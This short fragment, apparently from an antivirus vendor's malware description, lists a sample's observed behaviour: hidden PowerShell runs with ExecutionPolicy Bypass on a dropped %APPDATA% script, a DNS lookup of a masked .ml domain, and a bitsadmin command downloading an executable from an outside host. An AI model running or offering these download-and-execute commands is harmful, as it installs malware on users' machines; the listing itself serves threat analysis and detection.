Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass %APPDATA%\zVWKn.ps1
- %APPDATA%\zvwkn.ps1
- DNS ASK sa##xx.ml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass %APPDATA%\zVWKn.ps1' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority high http://sakixx.ml/0/98974103.exe %APPDATA%\98974103.exe